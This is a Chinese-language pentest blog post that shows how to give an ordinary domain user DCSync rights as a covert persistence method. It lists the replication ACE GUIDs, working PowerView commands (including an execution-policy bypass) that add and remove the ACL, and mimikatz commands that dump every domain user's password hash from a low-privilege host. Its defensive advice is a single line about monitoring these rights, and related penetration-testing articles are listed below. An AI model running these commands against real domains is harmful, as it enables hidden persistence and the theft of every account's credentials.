赋予域内普通用户dcsync权限来变向权限维持
文章目录
- 前言
- 利用过程
- 防御方法
前言
DCsync是几个权限的集合体,如果普通用户想具有DCsync权限,可以给对象添加以下三条ACE:
DS-Replication-Get-Changes,对应GUID为:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
DS-Replication-Get-Changes-All,对应GUID为:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
DS-Replication-Get-Changes-In-Filtered-Set,对应GUID为:89e95b76-444d-4c62-991a-0facbeda640c
利用过程
powerview
Set-ExecutionPolicy Bypass -Scope Process
. .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose
使用mimikatz在低权限主机上读取域内其他用户的密码
privilege::Debug #可以不用这一句
lsadump::dcsync /all /csv
结果如下,在低权限的zhangsan主机上可以使用mimikatz读取域内所有用户的hash:
删除账号dcsync权限:
Remove-DomainObjectAcl -TargetIdentity "DC=test,DC=com" -PrincipalIdentity zhangsan -Rights DCSync -Verbose
防御方法
监控前面讲述的几个权限的分配情况。
赋予域内普通用户dcsync权限来变向权限维持相关推荐
- 【域渗透】教你怎么利用DCSync导出域内所有用户hash
前言 在之前的文章<域渗透--DCSync>曾系统的整理过DCSync的利用方法,本文将要针对利用DCSync导出域内所有用户hash这一方法进行详细介绍,分析不同环境下的利用思路,给出防 ...
- ISA服务器之域内×××用户在外网通过CA验证连接域内×××服务器
一般情况下×××用户在连接×××服务器是是要输入密码的,如果这样的话,那么在一些公共场合输入密码的时候很有可能造成密码的泄露,从而造成不必要的损失.口令验证协议虽然硬件上的要求没有质询握手协议那么高, ...
- ad域同步其他ldap账号_域渗透——普通用户权限获得DNS记录
0x00 前言 在之前的文章<域渗透--DNS记录的获取>介绍了域渗透中获得DNS管理员权限后获取DNS记录的方法,而更普遍的情况是只有域普通用户的权限,也需要获得DNS记录. 本文将会参 ...
- 域中计算机与用户,域内计算机和用户获取实现vbs代码
显示当前域内所有计算机名称及数目 Const ADS_SCOPE_SUBTREE = 2 Set objRootDSE = GetObject("LDAP://rootDSE") ...
- 域渗透—域内用户枚举与密码喷洒攻击(Password Spraying)
目录 域内用户枚举 枚举原理 枚举tools 密码喷洒攻击 喷洒原理 喷洒工具 本章需要对Kerberos认证原理有所了解,传送门--> Kerberos 认证学习笔记 ,以及内网方面的知识 - ...
- Cobalt Strike 域内渗透
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...
- 计算机上用户和组的意义,在域中管理用户和组
本章要点: Ø 用户帐号和组概述 Ø 创建和管理用户帐号 Ø 在域中使用组的策略 3.1 用户帐号和组概述 活动目录是一种保存和维护网络资源所需的数据的目录服务数据库.域用户帐号在AD中创建一次,就能 ...
- CVE-2021-42287、CVE-2021-42278域内提权漏洞
目录 影响范围 漏洞介绍 测试环境 漏洞复现 使用sam-the-admin.py 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE- ...
- 内网安全:域内信息收集
目录 环境搭建 域基础知识 工作组和域 现实背景 常规信息收集 方式一:操作系统命令执行 常用总结 方式二:使用CS插件 关键信息收集 密码抓取测试 自动化信息收集工具 ADFind BloodHou ...
最新文章
- UML类图与类的关系
- ATP检查的一些TIPS
- [转]jkeyll的安装步骤
- chrome关闭自动升级_为什么Chrome的自动完成功能不安全以及如何将其关闭
- 1208. 尽可能使字符串相等
- vue中v-for的使用以及注意事项
- 以一定概率执行某段代码(Python实现)
- self-sizing cell的一个问题
- 修改整合的Jfinal的Model自动绑定表插件 AutoTableBindPlugin
- matlab教程simulink,MatlabSimulink教程课件.ppt
- vue的Des加密解密
- 计算机如何共享文件夹给另一台电脑,如何共享文件夹到另一台电脑,两台电脑要怎么共享文件呢?...
- 液晶显示屏简介以及与CRT显示屏的对比
- 10台堆垛机同时启动的那一刹那!
- 选择并遮住工具(边缘调整工具)+剪切蒙版法,扣除头发丝
- 第三届火焰杯软件测试初赛题目
- linux下s3c2440开发板,SAMSUNG S3C2440 ARM LINUX 开发板 上手初体验 --开发环境搭建
- 基于DDD的现代ASP.NET开发框架--ABP系列之2、ABP入门教程
- BDB(ICCV2019)
- 5.4 BGP地址聚合
热门文章
- php 超出省略号,input实现文字超出省略号(代码示例)
- Matlab CPU并行计算
- ICLR 2023 超高分工作|把图片视为点集,简单聚类算法实现强悍视觉架构
- 麦当劳、雀巢、汉高、赛诺菲、拜耳等企业入选“中国杰出雇主”榜单
- 这是C语言结课前(期末考试之前)写给牛晓霞的一封信!
- eclipse启动tomcat服务器特别慢-解决方法
- 密码学基础之对称密码体制和公钥密码体制
- 阻塞队列——生产者消费者模型
- python中常见的魔法方法 magic method
- sipp模拟freepbx分机测试(SIP协议调试)